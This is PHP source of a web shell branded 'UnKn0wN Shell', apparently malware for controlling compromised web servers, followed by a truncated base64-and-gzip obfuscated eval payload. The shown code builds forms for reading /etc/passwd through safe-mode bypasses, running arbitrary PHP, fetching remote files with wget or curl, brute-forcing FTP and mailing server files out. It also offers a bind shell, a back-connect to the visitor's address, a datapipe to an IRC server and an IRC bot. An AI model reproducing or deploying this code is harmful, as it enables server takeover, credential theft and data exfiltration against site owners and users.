echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;

echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo $te.'</div>'.$table_end1.$fe;

$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
 {
 $aliases2 .= "<option>$alias_name</option>";
 }
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;

}

if($safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}

echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
if(!$safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"UnKn0wN.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}


if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$unix&&function_exists('mb_send_mail')){
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_list')){
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_body')){
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
if(!$safe_mode&&$unix){
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo $te.'</div>'.$table_end1.$fe;
if(@function_exists("ftp_connect")){
echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("[email protected]"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("[email protected]"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix && @function_exists("ftp_connect")){
echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
echo $te.'</div>'.$table_end1.$fe;
}
if(@function_exists("mail")){
echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("[email protected]"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("[email protected]"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("[email protected]"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("[email protected]"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from sniper_sa shell"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on)    $select .= '<option>PostgreSQL</option>';
if($ora_on)   $select .= '<option>Oracle</option>';
$select .= '</select>';
echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
}
if(!$safe_mode&&$unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}

if($unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text214'].$arrow."</b>",in('text','ircadmin',15,'ircadmin'));
echo sr(40,"<b>".$lang[$language.'_text215'].$arrow."</b>",in('text','ircserver',15,'ircserver'));
echo sr(40,"<b>".$lang[$language.'_text216'].$arrow."</b>",in('text','ircchanal',15,'ircchanl'));
echo sr(40,"<b>".$lang[$language.'_text217'].$arrow."</b>",in('text','ircname',15,'ircname'));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ips',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','ports',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));

echo $te."</td>".$fe."</tr></div></table>";
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---{  UnKn0wN Shell }---o</b></font></div></td></tr></table>";

Did this file decode correctly?

Original Code

<?php

eval (gzinflate(base64_decode('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